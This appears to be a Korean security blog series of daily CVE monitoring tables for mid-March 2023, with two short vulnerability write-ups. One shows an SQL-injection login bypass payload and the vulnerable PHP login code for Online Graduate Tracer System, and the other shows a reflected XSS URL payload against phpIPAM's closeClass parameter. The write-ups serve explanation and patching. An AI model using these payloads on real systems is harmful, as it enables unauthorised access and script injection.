반응형
datetime subject id link
2023-03-21 00:00:01.939276 (PHP) CVE-2023-28426 https://cve.report/CVE-2023-28426
2023-03-21 01:00:02.567790 (GitHub, XSS) CVE-2023-1517 https://cve.report/CVE-2023-1517
2023-03-21 01:00:02.568369 (GitHub, XSS) CVE-2023-1515 https://cve.report/CVE-2023-1515
2023-03-21 02:00:02.960611 (WordPress, Wordpress Plugin) CVE-2023-0940 https://cve.report/CVE-2023-0940
2023-03-21 02:00:02.961153 (WordPress, Wordpress Plugin) CVE-2023-0937 https://cve.report/CVE-2023-0937
2023-03-21 02:00:02.961665 (WordPress, Wordpress Plugin) CVE-2023-0911 https://cve.report/CVE-2023-0911
2023-03-21 02:00:02.962210 (WordPress, Wordpress Plugin) CVE-2023-0890 https://cve.report/CVE-2023-0890
2023-03-21 02:00:02.962699 (WordPress, Wordpress Plugin) CVE-2023-0876 https://cve.report/CVE-2023-0876
2023-03-21 02:00:02.963215 (WordPress, SQL injection, Wordpress Plugin) CVE-2023-0875 https://cve.report/CVE-2023-0875
2023-03-21 02:00:02.963730 (WordPress, Wordpress Plugin) CVE-2023-0865 https://cve.report/CVE-2023-0865
2023-03-21 02:00:02.964296 (WordPress, Wordpress Plugin) CVE-2023-0631 https://cve.report/CVE-2023-0631
2023-03-21 02:00:02.964802 (WordPress, Wordpress Plugin) CVE-2023-0630 https://cve.report/CVE-2023-0630
2023-03-21 02:00:02.965304 (WordPress, Wordpress Plugin) CVE-2023-0370 https://cve.report/CVE-2023-0370
2023-03-21 02:00:02.965818 (WordPress, Wordpress Plugin) CVE-2023-0369 https://cve.report/CVE-2023-0369
2023-03-21 02:00:02.966323 (WordPress, Wordpress Plugin) CVE-2023-0365 https://cve.report/CVE-2023-0365
2023-03-21 02:00:02.966837 (WordPress, Wordpress Plugin) CVE-2023-0364 https://cve.report/CVE-2023-0364
2023-03-21 02:00:02.967379 (WordPress, PHP, Wordpress Plugin) CVE-2023-0340 https://cve.report/CVE-2023-0340
2023-03-21 02:00:02.967931 (WordPress, Wordpress Plugin) CVE-2023-0273 https://cve.report/CVE-2023-0273
2023-03-21 02:00:02.968433 (WordPress, Wordpress Plugin) CVE-2023-0175 https://cve.report/CVE-2023-0175
2023-03-21 02:00:02.968942 (WordPress, Wordpress Plugin) CVE-2023-0167 https://cve.report/CVE-2023-0167
2023-03-21 02:00:02.969438 (WordPress, Wordpress Plugin) CVE-2023-0145 https://cve.report/CVE-2023-0145
2023-03-21 02:00:02.969944 (WordPress, Wordpress Plugin) CVE-2022-4148 https://cve.report/CVE-2022-4148
2023-03-21 02:00:02.970445 (WordPress, Wordpress Plugin) CVE-2022-3894 https://cve.report/CVE-2022-3894
2023-03-21 06:00:03.261363 (redis) CVE-2023-28425 https://cve.report/CVE-2023-28425
2023-03-21 10:00:02.465601 (GitHub, XSS) CVE-2023-1527 https://cve.report/CVE-2023-1527
2023-03-21 14:00:02.364631 (GitHub) CVE-2023-1543 https://cve.report/CVE-2023-1543
2023-03-21 14:00:02.365194 (GitHub) CVE-2023-1542 https://cve.report/CVE-2023-1542
2023-03-21 14:00:02.365712 (GitHub) CVE-2023-1541 https://cve.report/CVE-2023-1541
2023-03-21 14:00:02.366242 (GitHub) CVE-2023-1539 https://cve.report/CVE-2023-1539
2023-03-21 14:00:02.366756 (GitHub) CVE-2023-1538 https://cve.report/CVE-2023-1538
2023-03-21 14:00:02.367291 (GitHub) CVE-2023-1537 https://cve.report/CVE-2023-1537
2023-03-21 14:00:02.367806 (GitHub, XSS) CVE-2023-1536 https://cve.report/CVE-2023-1536
2023-03-21 14:00:02.368407 (GitHub, XSS) CVE-2023-1535 https://cve.report/CVE-2023-1535
2023-03-21 14:00:02.368912 (GitHub) CVE-2023-1540 https://cve.report/CVE-2023-1540
2023-03-21 16:00:02.847677 (Remote Code Execution, Critical) CVE-2023-27980 https://cve.report/CVE-2023-27980
2023-03-21 16:00:02.848283 (XSS) CVE-2022-42485 https://cve.report/CVE-2022-42485
2023-03-21 17:00:01.961586 (Remote Code Execution) CVE-2023-27982 https://cve.report/CVE-2023-27982
2023-03-21 18:00:02.060118 (Remote Code Execution) CVE-2023-27978 https://cve.report/CVE-2023-27978
2023-03-21 19:00:02.561340 (Remote Code Execution) CVE-2023-27981 https://cve.report/CVE-2023-27981
2023-03-21 20:00:02.847672 (Remote Code Execution) CVE-2023-27984 https://cve.report/CVE-2023-27984
2023-03-21 20:00:02.849362 (GitHub, SQL injection) CVE-2023-1545 https://cve.report/CVE-2023-1545
2023-03-21 22:00:02.363139 (XSS) CVE-2023-1154 https://cve.report/CVE-2023-1154
2023-03-21 22:00:02.363887 (SQL injection) CVE-2023-1153 https://cve.report/CVE-2023-1153
반응형

'Hacking > CVE List' 카테고리의 다른 글

[CVE] 2023. 03. 23. MR(Monitoring Report)  (0) 2023.03.24
[CVE] 2023. 03. 22. MR(Monitoring Report)  (0) 2023.03.24
[CVE] 2023. 03. 20. MR(Monitoring Report)  (0) 2023.03.21
[CVE] 2023. 03. 19. MR(Monitoring Report)  (0) 2023.03.20
[CVE] 2023. 03. 18. MR(Monitoring Report)  (0) 2023.03.19
반응형
datetime subject id link
2023-03-20 02:00:02.862956 (GitHub, XSS) CVE-2023-1496 https://cve.report/CVE-2023-1496
2023-03-20 05:00:02.848560 (PHP, Critical, File Upload) CVE-2023-1497 https://cve.report/CVE-2023-1497
2023-03-20 06:00:02.065063 (PHP, Critical) CVE-2023-1501 https://cve.report/CVE-2023-1501
2023-03-20 06:00:02.065593 (PHP) CVE-2023-1500 https://cve.report/CVE-2023-1500
2023-03-20 06:00:02.066110 (PHP, SQL injection, Critical) CVE-2023-1499 https://cve.report/CVE-2023-1499
2023-03-20 06:00:02.066618 (PHP, SQL injection, Critical) CVE-2023-1498 https://cve.report/CVE-2023-1498
2023-03-20 15:00:02.973068 (PHP, SQL injection, Critical) CVE-2022-4933 https://cve.report/CVE-2022-4933
2023-03-20 19:00:02.560027 (PHP, SQL injection, Critical) CVE-2023-1505 https://cve.report/CVE-2023-1505
2023-03-20 19:00:02.560591 (SQL injection, Critical) CVE-2023-1504 https://cve.report/CVE-2023-1504
2023-03-20 19:00:02.561112 (PHP, SQL injection, Critical) CVE-2023-1503 https://cve.report/CVE-2023-1503
2023-03-20 19:00:02.561649 (PHP, SQL injection, Critical) CVE-2023-1502 https://cve.report/CVE-2023-1502
2023-03-20 19:00:02.562223 (XSS) CVE-2023-1248 https://cve.report/CVE-2023-1248
2023-03-20 20:00:02.968586 (PHP) CVE-2023-1507 https://cve.report/CVE-2023-1507
2023-03-20 20:00:02.969119 (PHP, SQL injection, Critical) CVE-2023-1506 https://cve.report/CVE-2023-1506
2023-03-20 21:00:02.359671 (XSS) CVE-2023-25795 https://cve.report/CVE-2023-25795
2023-03-20 21:00:02.360216 (XSS) CVE-2023-25794 https://cve.report/CVE-2023-25794
2023-03-20 21:00:02.360715 (XSS) CVE-2023-25064 https://cve.report/CVE-2023-25064
2023-03-20 21:00:02.361190 (XSS) CVE-2023-24381 https://cve.report/CVE-2023-24381
2023-03-20 22:00:02.460840 (XSS) CVE-2023-23718 https://cve.report/CVE-2023-23718
2023-03-20 22:00:02.461344 (XSS) CVE-2023-22682 https://cve.report/CVE-2023-22682
2023-03-20 22:00:02.461847 (XSS) CVE-2023-22680 https://cve.report/CVE-2023-22680
2023-03-20 22:00:02.462332 (XSS) CVE-2023-22679 https://cve.report/CVE-2023-22679
2023-03-20 22:00:02.462866 (XSS) CVE-2022-47592 https://cve.report/CVE-2022-47592
2023-03-20 23:00:02.763652 (XSS) CVE-2023-0320 https://cve.report/CVE-2023-0320
2023-03-20 23:00:02.764303 (SQL injection) CVE-2023-28424 https://cve.report/CVE-2023-28424
2023-03-20 23:00:02.764866 (XSS) CVE-2022-47591 https://cve.report/CVE-2022-47591
반응형

'Hacking > CVE List' 카테고리의 다른 글

[CVE] 2023. 03. 22. MR(Monitoring Report)  (0) 2023.03.24
[CVE] 2023. 03. 21. MR(Monitoring Report)  (0) 2023.03.22
[CVE] 2023. 03. 19. MR(Monitoring Report)  (0) 2023.03.20
[CVE] 2023. 03. 18. MR(Monitoring Report)  (0) 2023.03.19
[CVE] 2023. 03. 17. MR(Monitoring Report)  (0) 2023.03.18
반응형
datetime subject id link
2023-03-19 04:00:03.077256 (XSS) CVE-2023-28607 https://cve.report/CVE-2023-28607
2023-03-19 04:00:03.077709 (XSS) CVE-2023-28606 https://cve.report/CVE-2023-28606
2023-03-19 07:00:02.460821 (PHP) CVE-2023-1485 https://cve.report/CVE-2023-1485
2023-03-19 08:00:02.360192 (Critical) CVE-2023-1491 https://cve.report/CVE-2023-1491
2023-03-19 08:00:02.360701 (Critical) CVE-2023-1490 https://cve.report/CVE-2023-1490
2023-03-19 08:00:02.361227 (Critical) CVE-2023-1489 https://cve.report/CVE-2023-1489
2023-03-19 09:00:03.169107 (PHP, SQL injection, Critical) CVE-2023-1494 https://cve.report/CVE-2023-1494
2023-03-19 10:00:02.471809 (SQL injection, Critical) CVE-2023-1495 https://cve.report/CVE-2023-1495
2023-03-19 11:00:03.133302 (PHP, SQL injection) CVE-2023-26905 https://cve.report/CVE-2023-26905
2023-03-19 13:00:02.661981 (Arbitrary Command) CVE-2023-28617 https://cve.report/CVE-2023-28617
반응형

'Hacking > CVE List' 카테고리의 다른 글

[CVE] 2023. 03. 21. MR(Monitoring Report)  (0) 2023.03.22
[CVE] 2023. 03. 20. MR(Monitoring Report)  (0) 2023.03.21
[CVE] 2023. 03. 18. MR(Monitoring Report)  (0) 2023.03.19
[CVE] 2023. 03. 17. MR(Monitoring Report)  (0) 2023.03.18
[CVE] 2023. 03. 16. MR(Monitoring Report)  (0) 2023.03.18
반응형
datetime subject id link
2023-03-18 00:00:05.272886 (WordPress, SQL injection) CVE-2023-1471 https://cve.report/CVE-2023-1471
2023-03-18 00:00:05.273781 (WordPress) CVE-2023-1470 https://cve.report/CVE-2023-1470
2023-03-18 00:00:05.274610 (XSS) CVE-2022-45817 https://cve.report/CVE-2022-45817
2023-03-18 00:00:05.275285 (XSS) CVE-2022-45814 https://cve.report/CVE-2022-45814
2023-03-18 00:00:05.276098 (XSS) CVE-2022-43461 https://cve.report/CVE-2022-43461
2023-03-18 01:00:03.379755 (PHP, SQL injection, Critical) CVE-2023-1475 https://cve.report/CVE-2023-1475
2023-03-18 01:00:03.380388 (PHP, SQL injection, Critical) CVE-2023-1474 https://cve.report/CVE-2023-1474
2023-03-18 01:00:03.455022 (WordPress) CVE-2023-1472 https://cve.report/CVE-2023-1472
2023-03-18 06:00:05.680116 (Kubernetes) CVE-2023-27593 https://cve.report/CVE-2023-27593
2023-03-18 07:54:04.238858 (Remote Code Execution, Laravel, PHP) CVE-2023-28115 https://cve.report/CVE-2023-28115
2023-03-18 07:54:04.239418 (Kubernetes) CVE-2023-27595 https://cve.report/CVE-2023-27595
2023-03-18 07:54:04.239972 (Command Injection, Arbitrary Command) CVE-2023-27253 https://cve.report/CVE-2023-27253
2023-03-18 14:00:03.263511 (Squid, XSS) CVE-2023-24278 https://cve.report/CVE-2023-24278
2023-03-18 19:00:02.658682 (PHP) CVE-2023-1481 https://cve.report/CVE-2023-1481
2023-03-18 19:00:02.659181 (PHP, SQL injection, Critical) CVE-2023-1480 https://cve.report/CVE-2023-1480
2023-03-18 19:00:02.659678 (PHP, Critical) CVE-2023-1479 https://cve.report/CVE-2023-1479
2023-03-18 20:00:02.867187 (Critical) CVE-2023-1484 https://cve.report/CVE-2023-1484
2023-03-18 20:00:02.867698 (SQL injection, Critical) CVE-2023-1483 https://cve.report/CVE-2023-1483
2023-03-18 20:00:02.868245 (PHP, Code Injection) CVE-2023-1482 https://cve.report/CVE-2023-1482
반응형

'Hacking > CVE List' 카테고리의 다른 글

[CVE] 2023. 03. 20. MR(Monitoring Report)  (0) 2023.03.21
[CVE] 2023. 03. 19. MR(Monitoring Report)  (0) 2023.03.20
[CVE] 2023. 03. 17. MR(Monitoring Report)  (0) 2023.03.18
[CVE] 2023. 03. 16. MR(Monitoring Report)  (0) 2023.03.18
[CVE] 2023. 03. 15. MR(Monitoring Report)  (0) 2023.03.16
반응형

ref

배경

  • Graduate Tracer System 은 학적을 관리하는 시스템이다.
  • Graduate Tracer System 1.0에서 sqli 취약성이 발견되었습니다. 영향을 받는 것은 admin/adminlog.php 파일의 함수이다다. 사용자가 파라미터를 조작하면 SQL 주입이 발생한다. 원격으로 공격이 가능하며, 관리자권한으로 접근 및 명령어 실행이 가능한 취약점이다. 취약성에 대한 공격 방안은 공개가 되어 있습니다.

분석

  • 이 프로그램은 phpstudy 8.1.1.3 을 기반으로 하고 있다.
  • Vulnerability File: tracking/admin/adminlog.php
  • Vulnerability location: tracking/admin/adminlog.php user
  • 로그인시 사용하는 user=* [+] Payload: 파라미터에 페이로드로 공격이 가능하다.

테스트

  1. 관리자 로그인 페이지로 접근
  2. 아이디 부분에 payload를 입력 admin%27 ‘1’=’1 입력
  3. prepared statement 사용하지 않고, 파라미터를 그대로 쿼리스트링의 변수로 받기 때문에 취약성이 발생 slq = select * from xxx where user = ‘admin’ or ‘1’=’1’ and xxx
<?php include('dbcon.php');
 session_start();
if (isset($_POST['submit'])){	
$user = $_POST['user'];
$password = sha1($_POST['password']);

        **$sql = "select * from adminuser where user = '$user' and password = '$password'";**
        $result = mysqli_query($conn,$sql);
                        if ($result->num_rows> 0){
                        $row = mysqli_fetch_assoc($result);
                        $_SESSION['id'] = $row['id'];
                        header("Location:homead.php");
      }else{
                            echo "<script>alert('Mali!! ang iyong user o password na nalagay paki-ulit muli.')</script>";
                        }

}?>

패치 방법

  • 패치 제공하지 않음
  • prepared statement로 변경 후 가동
$stmt = $conn->prepare("**select * from adminuser where user = ? and password = ?**");
$stmt->bind_param("ss", $user, $password);
반응형

'Hacking > CVE Report' 카테고리의 다른 글

[CVE-2023-1761] Code Injection in GitHub repository thorsten/phpmyfaq prior to 3.1.12.  (0) 2023.04.19
[CVE-2022-47607]Usersnap <= 4.16 - Authenticated (Admin+) Stored Cross Site Scripting  (0) 2023.03.31
[CVE-2023-24657] pipipam v1.5 reflected cross-site scripting (XSS)  (0) 2023.03.16
[CVE-2023-27985] RCE using bad deserialization in builderio/qwik  (0) 2023.03.14
[CVE-2023-1312] Certain versions of Pimcore/pimcore from Pimcore contain the following vulnerability  (0) 2023.03.11
반응형
datetime subject id link
2023-03-17 01:00:03.375156 (Remote Attack) CVE-2023-27789 https://cve.report/CVE-2023-27789
2023-03-17 01:00:03.375726 (Remote Attack) CVE-2023-27788 https://cve.report/CVE-2023-27788
2023-03-17 01:00:03.376233 (Remote Attack) CVE-2023-27787 https://cve.report/CVE-2023-27787
2023-03-17 01:00:03.376771 (Remote Attack) CVE-2023-27786 https://cve.report/CVE-2023-27786
2023-03-17 01:00:03.377284 (Remote Attack) CVE-2023-27785 https://cve.report/CVE-2023-27785
2023-03-17 01:00:03.377797 (Remote Attack) CVE-2023-27784 https://cve.report/CVE-2023-27784
2023-03-17 01:00:03.378317 (Remote Attack) CVE-2023-27783 https://cve.report/CVE-2023-27783
2023-03-17 01:00:03.378834 (Remote Attack, PHP) CVE-2023-27711 https://cve.report/CVE-2023-27711
2023-03-17 01:00:03.379339 (Remote Attack, PHP, SQL injection) CVE-2023-27709 https://cve.report/CVE-2023-27709
2023-03-17 01:00:03.379859 (Remote Attack, PHP, SQL injection) CVE-2023-27707 https://cve.report/CVE-2023-27707
2023-03-17 01:00:03.380362 (Remote Attack) CVE-2023-27131 https://cve.report/CVE-2023-27131
2023-03-17 01:00:03.380876 (Remote Attack) CVE-2023-27130 https://cve.report/CVE-2023-27130
2023-03-17 01:00:03.381375 (Remote Code Execution, PHP) CVE-2023-27037 https://cve.report/CVE-2023-27037
2023-03-17 01:00:03.381894 (Remote Attack) CVE-2023-26769 https://cve.report/CVE-2023-26769
2023-03-17 01:00:03.455557 (Remote Attack) CVE-2023-26768 https://cve.report/CVE-2023-26768
2023-03-17 01:00:03.456167 (Remote Attack) CVE-2023-26767 https://cve.report/CVE-2023-26767
2023-03-17 02:00:03.599063 (GraphQL) CVE-2023-28104 https://cve.report/CVE-2023-28104
2023-03-17 02:00:03.599937 (Remote Code Execution) CVE-2023-27040 https://cve.report/CVE-2023-27040
2023-03-17 03:00:04.665399 (Docker) CVE-2023-28109 https://cve.report/CVE-2023-28109
2023-03-17 03:00:04.666091 (PHP, SQL injection) CVE-2023-27041 https://cve.report/CVE-2023-27041
2023-03-17 03:00:04.666687 (Kubernetes) CVE-2023-28110 https://cve.report/CVE-2023-28110
2023-03-17 06:00:05.259798 (Code Injection) CVE-2023-0598 https://cve.report/CVE-2023-0598
2023-03-17 07:00:04.967244 (XSS) CVE-2023-27494 https://cve.report/CVE-2023-27494
2023-03-17 07:00:04.969417 (Remote Code Execution) CVE-2022-43605 https://cve.report/CVE-2022-43605
2023-03-17 07:00:04.970018 (Remote Code Execution) CVE-2022-43604 https://cve.report/CVE-2022-43604
2023-03-17 07:00:04.970580 (sqlite) CVE-2022-43441 https://cve.report/CVE-2022-43441
2023-03-17 08:00:07.178085 (XSS) CVE-2023-27059 https://cve.report/CVE-2023-27059
2023-03-17 14:00:04.465122 (OpenSSH) CVE-2023-28531 https://cve.report/CVE-2023-28531
2023-03-17 17:00:05.775902 (PHP, SQL injection, Critical) CVE-2023-1455 https://cve.report/CVE-2023-1455
2023-03-17 17:00:05.776520 (SQL injection, Critical) CVE-2023-1454 https://cve.report/CVE-2023-1454
2023-03-17 17:00:05.777117 (Critical) CVE-2023-1453 https://cve.report/CVE-2023-1453
2023-03-17 17:00:05.777741 (Critical) CVE-2023-1452 https://cve.report/CVE-2023-1452
2023-03-17 17:00:05.855049 (Critical) CVE-2023-1444 https://cve.report/CVE-2023-1444
2023-03-17 17:00:05.855813 (PHP) CVE-2023-1442 https://cve.report/CVE-2023-1442
2023-03-17 17:00:05.856393 (PHP, SQL injection, Critical) CVE-2023-1441 https://cve.report/CVE-2023-1441
2023-03-17 17:00:05.857352 (PHP, SQL injection, Critical) CVE-2023-1440 https://cve.report/CVE-2023-1440
2023-03-17 17:00:05.858000 (PHP, SQL injection, Critical) CVE-2023-1439 https://cve.report/CVE-2023-1439
2023-03-17 18:00:05.672265 (PHP, Critical) CVE-2023-1460 https://cve.report/CVE-2023-1460
2023-03-17 18:00:05.673872 (PHP, SQL injection, Critical) CVE-2023-1459 https://cve.report/CVE-2023-1459
2023-03-17 19:00:04.374013 (PHP, SQL injection, Critical) CVE-2023-1461 https://cve.report/CVE-2023-1461
2023-03-17 19:00:04.374641 (SQL injection) CVE-2023-1152 https://cve.report/CVE-2023-1152
2023-03-17 21:00:06.073189 (GitHub) CVE-2023-1463 https://cve.report/CVE-2023-1463
2023-03-17 22:00:04.778266 (SQL injection, Critical) CVE-2023-1468 https://cve.report/CVE-2023-1468
2023-03-17 22:00:04.778911 (PHP, Critical) CVE-2023-1467 https://cve.report/CVE-2023-1467
2023-03-17 22:00:04.854546 (SQL injection, Critical) CVE-2023-1466 https://cve.report/CVE-2023-1466
2023-03-17 22:00:04.855390 (PHP, Critical) CVE-2023-1464 https://cve.report/CVE-2023-1464
2023-03-17 23:00:04.871377 (WordPress) CVE-2023-1469 https://cve.report/CVE-2023-1469
2023-03-17 23:00:04.872051 (WordPress) CVE-2023-1172 https://cve.report/CVE-2023-1172
반응형

'Hacking > CVE List' 카테고리의 다른 글

[CVE] 2023. 03. 19. MR(Monitoring Report)  (0) 2023.03.20
[CVE] 2023. 03. 18. MR(Monitoring Report)  (0) 2023.03.19
[CVE] 2023. 03. 16. MR(Monitoring Report)  (0) 2023.03.18
[CVE] 2023. 03. 15. MR(Monitoring Report)  (0) 2023.03.16
[CVE] 2023. 03. 13. MR(Monitoring Report)  (0) 2023.03.14
반응형
datetime subject id link
2023-03-16 00:00:05.676810 (Apache Tomcat) CVE-2023-0100 https://cve.report/CVE-2023-0100
2023-03-16 00:00:05.677639 (SQL injection) CVE-2023-24732 https://cve.report/CVE-2023-24732
2023-03-16 00:00:05.678085 (SQL injection) CVE-2023-24731 https://cve.report/CVE-2023-24731
2023-03-16 00:00:05.678791 (SQL injection) CVE-2023-24730 https://cve.report/CVE-2023-24730
2023-03-16 00:00:05.679308 (SQL injection) CVE-2023-24729 https://cve.report/CVE-2023-24729
2023-03-16 00:00:05.679947 (SQL injection) CVE-2023-24728 https://cve.report/CVE-2023-24728
2023-03-16 00:00:05.754858 (SQL injection) CVE-2023-24726 https://cve.report/CVE-2023-24726
2023-03-16 01:00:03.095222 (SQL injection) CVE-2022-44580 https://cve.report/CVE-2022-44580
2023-03-16 02:00:03.060054 (PHP) CVE-2023-1418 https://cve.report/CVE-2023-1418
2023-03-16 02:00:03.060588 (PHP, SQL injection, Critical) CVE-2023-1416 https://cve.report/CVE-2023-1416
2023-03-16 02:00:03.061097 (PHP, Critical) CVE-2023-1415 https://cve.report/CVE-2023-1415
2023-03-16 02:00:03.061628 (PHP, SQL injection, Critical) CVE-2023-1379 https://cve.report/CVE-2023-1379
2023-03-16 02:00:03.062125 (XSS) CVE-2022-37402 https://cve.report/CVE-2022-37402
2023-03-16 04:00:04.571689 (nginx) CVE-2023-25804 https://cve.report/CVE-2023-25804
2023-03-16 04:00:04.572155 (Command Injection) CVE-2023-24229 https://cve.report/CVE-2023-24229
2023-03-16 06:00:06.078321 (XSS) CVE-2023-26912 https://cve.report/CVE-2023-26912
2023-03-16 07:00:06.163612 (Kubernetes, Critical) CVE-2023-26484 https://cve.report/CVE-2023-26484
2023-03-16 09:00:06.355160 (Remote Code Execution) CVE-2023-28461 https://cve.report/CVE-2023-28461
2023-03-16 09:00:06.356189 (Command Injection, Remote Attack) CVE-2023-28460 https://cve.report/CVE-2023-28460
2023-03-16 09:00:06.358310 (Command Injection) CVE-2023-1389 https://cve.report/CVE-2023-1389
2023-03-16 09:00:06.358937 (Arbitrary Command) CVE-2022-4313 https://cve.report/CVE-2022-4313
2023-03-16 11:00:05.857071 (XSS) CVE-2023-26951 https://cve.report/CVE-2023-26951
2023-03-16 11:00:05.857683 (Command Injection) CVE-2023-25280 https://cve.report/CVE-2023-25280
2023-03-16 12:00:07.555624 (PHP, SQL injection) CVE-2023-26784 https://cve.report/CVE-2023-26784
2023-03-16 12:00:07.556107 (Command Execution) CVE-2023-24795 https://cve.report/CVE-2023-24795
2023-03-16 12:00:07.556611 (Remote Attack) CVE-2023-24760 https://cve.report/CVE-2023-24760
2023-03-16 19:00:04.877055 (XSS) CVE-2022-40699 https://cve.report/CVE-2022-40699
2023-03-16 19:00:04.877582 (XSS) CVE-2022-38971 https://cve.report/CVE-2022-38971
2023-03-16 20:00:05.179500 (XSS) CVE-2022-41554 https://cve.report/CVE-2022-41554
2023-03-16 22:00:04.871453 (GitHub, XSS) CVE-2023-1429 https://cve.report/CVE-2023-1429
2023-03-16 22:00:04.872009 (Arbitrary Command) CVE-2023-24671 https://cve.report/CVE-2023-24671
2023-03-16 23:00:04.968759 (PHP, SQL injection) CVE-2023-27250 https://cve.report/CVE-2023-27250
2023-03-16 23:00:04.969330 (PHP) CVE-2023-1433 https://cve.report/CVE-2023-1433
2023-03-16 23:00:04.969910 (PHP, Critical) CVE-2023-1432 https://cve.report/CVE-2023-1432
2023-03-16 23:00:04.970505 (WordPress) CVE-2023-1431 https://cve.report/CVE-2023-1431
반응형

'Hacking > CVE List' 카테고리의 다른 글

[CVE] 2023. 03. 18. MR(Monitoring Report)  (0) 2023.03.19
[CVE] 2023. 03. 17. MR(Monitoring Report)  (0) 2023.03.18
[CVE] 2023. 03. 15. MR(Monitoring Report)  (0) 2023.03.16
[CVE] 2023. 03. 13. MR(Monitoring Report)  (0) 2023.03.14
[CVE] 2023. 03. 11. MR(Monitoring Report)  (0) 2023.03.12
반응형

ref

배경

  • pipipam 은 open-source web IP address management application 이다.
  • phpipam v1.5 버젼에서 Reflected corss-site scripting공격이 가능한 파라미터가 발견되었다. 해당 파라미터는 closeClass 이고 /subnet-masks/popup.php. 엔트리에서 발견되었다.

분석

테스트

  1. 로그인을 수행
  2. 로그인 이후 아래 공격 코드를 url로 입력
[<https://demo.phpipam.net/app/tools/subnet-masks/popup.php?closeClass=">](https://demo.phpipam.net/app/tools/subnet-masks/popup.php?closeClass=%22%3E)alert("XSS>")

<!-- footer -->
<div class="pFooter">
	<div class="btn-group">
		<button class="btn btn-sm btn-default <?php print @$_REQUEST['closeClass']; ?>"><?php print _('Close'); ?></button>
	</div>
</div>
  • 공격코드로 공격 수행시 브라우져 응답은 다음과 같다.
<!-- footer -->
<div class="pFooter">
	<div class="btn-group">
		<button class="btn btn-sm btn-default "><script>alert("XSS")</script>">Close</button>
	</div>
</div>

패치 방법

반응형

'Hacking > CVE Report' 카테고리의 다른 글

[CVE-2023-1761] Code Injection in GitHub repository thorsten/phpmyfaq prior to 3.1.12.  (0) 2023.04.19
[CVE-2022-47607]Usersnap <= 4.16 - Authenticated (Admin+) Stored Cross Site Scripting  (0) 2023.03.31
[CVE-2023-1308] Online Graduate Tracer System sql injection  (0) 2023.03.18
[CVE-2023-27985] RCE using bad deserialization in builderio/qwik  (0) 2023.03.14
[CVE-2023-1312] Certain versions of Pimcore/pimcore from Pimcore contain the following vulnerability  (0) 2023.03.11
반응형

 

datetime subject id link
2023-03-15 01:00:03.629320 (SQL injection) CVE-2023-27074 https://cve.report/CVE-2023-27074
2023-03-15 01:00:03.629865 (Critical) CVE-2023-1398 https://cve.report/CVE-2023-1398
2023-03-15 01:00:03.630307 (PHP) CVE-2023-1397 https://cve.report/CVE-2023-1397
2023-03-15 01:00:03.630776 (PHP) CVE-2023-1396 https://cve.report/CVE-2023-1396
2023-03-15 01:00:03.631229 (PHP) CVE-2023-1395 https://cve.report/CVE-2023-1395
2023-03-15 01:00:03.631665 (MySQL, PHP, SQL injection, Critical) CVE-2023-1394 https://cve.report/CVE-2023-1394
2023-03-15 01:00:03.632155 (Critical) CVE-2023-1392 https://cve.report/CVE-2023-1392
2023-03-15 01:00:03.632568 (PHP) CVE-2023-1391 https://cve.report/CVE-2023-1391
2023-03-15 02:00:03.310142 (XSS) CVE-2023-27070 https://cve.report/CVE-2023-27070
2023-03-15 02:00:03.310566 (XSS) CVE-2023-27069 https://cve.report/CVE-2023-27069
2023-03-15 03:00:04.001083 (Remote Code Execution) CVE-2023-24913 https://cve.report/CVE-2023-24913
2023-03-15 03:00:04.002028 (Remote Code Execution) CVE-2023-24907 https://cve.report/CVE-2023-24907
2023-03-15 03:00:04.002765 (Remote Code Execution) CVE-2023-24872 https://cve.report/CVE-2023-24872
2023-03-15 03:00:04.003239 (Remote Code Execution) CVE-2023-24869 https://cve.report/CVE-2023-24869
2023-03-15 03:00:04.003687 (Remote Code Execution) CVE-2023-24867 https://cve.report/CVE-2023-24867
2023-03-15 03:00:04.004528 (Remote Code Execution) CVE-2023-24909 https://cve.report/CVE-2023-24909
2023-03-15 03:00:04.004984 (Remote Code Execution) CVE-2023-24908 https://cve.report/CVE-2023-24908
2023-03-15 03:00:04.005456 (Remote Code Execution) CVE-2023-24876 https://cve.report/CVE-2023-24876
2023-03-15 03:00:04.005888 (Remote Code Execution) CVE-2023-24871 https://cve.report/CVE-2023-24871
2023-03-15 03:00:04.006270 (Remote Code Execution) CVE-2023-24868 https://cve.report/CVE-2023-24868
2023-03-15 03:00:04.006999 (SQL injection) CVE-2023-25206 https://cve.report/CVE-2023-25206
2023-03-15 03:00:04.007473 (Remote Code Execution) CVE-2023-23416 https://cve.report/CVE-2023-23416
2023-03-15 03:00:04.007902 (Remote Code Execution) CVE-2023-23415 https://cve.report/CVE-2023-23415
2023-03-15 03:00:04.008284 (Remote Code Execution) CVE-2023-23414 https://cve.report/CVE-2023-23414
2023-03-15 03:00:04.008644 (Remote Code Execution) CVE-2023-23413 https://cve.report/CVE-2023-23413
2023-03-15 03:00:04.009174 (HTTP.sys) CVE-2023-23410 https://cve.report/CVE-2023-23410
2023-03-15 03:00:04.009589 (Azure) CVE-2023-23408 https://cve.report/CVE-2023-23408
2023-03-15 03:00:04.010008 (Remote Code Execution) CVE-2023-23407 https://cve.report/CVE-2023-23407
2023-03-15 03:00:04.010382 (Remote Code Execution) CVE-2023-23406 https://cve.report/CVE-2023-23406
2023-03-15 03:00:04.010783 (Remote Code Execution) CVE-2023-23405 https://cve.report/CVE-2023-23405
2023-03-15 03:00:04.011189 (Remote Code Execution) CVE-2023-23404 https://cve.report/CVE-2023-23404
2023-03-15 03:00:04.011549 (Remote Code Execution) CVE-2023-23403 https://cve.report/CVE-2023-23403
2023-03-15 03:00:04.011969 (Remote Code Execution) CVE-2023-23402 https://cve.report/CVE-2023-23402
2023-03-15 03:00:04.012334 (Remote Code Execution) CVE-2023-23401 https://cve.report/CVE-2023-23401
2023-03-15 03:00:04.012688 (Remote Code Execution) CVE-2023-23400 https://cve.report/CVE-2023-23400
2023-03-15 03:00:04.013109 (Remote Code Execution) CVE-2023-23399 https://cve.report/CVE-2023-23399
2023-03-15 03:00:04.013773 (Remote Code Execution) CVE-2023-23392 https://cve.report/CVE-2023-23392
2023-03-15 03:00:04.014393 (Remote Code Execution) CVE-2023-21708 https://cve.report/CVE-2023-21708
2023-03-15 04:00:04.620937 (GraphQL) CVE-2023-27588 https://cve.report/CVE-2023-27588
2023-03-15 06:00:06.518784 (Command Injection, PHP) CVE-2023-28343 https://cve.report/CVE-2023-28343
2023-03-15 12:00:06.775986 (Remote Attack, PHP) CVE-2023-26511 https://cve.report/CVE-2023-26511
2023-03-15 12:00:06.776503 (File Upload) CVE-2023-26262 https://cve.report/CVE-2023-26262
2023-03-15 13:00:04.773870 (File Upload) CVE-2023-27757 https://cve.report/CVE-2023-27757
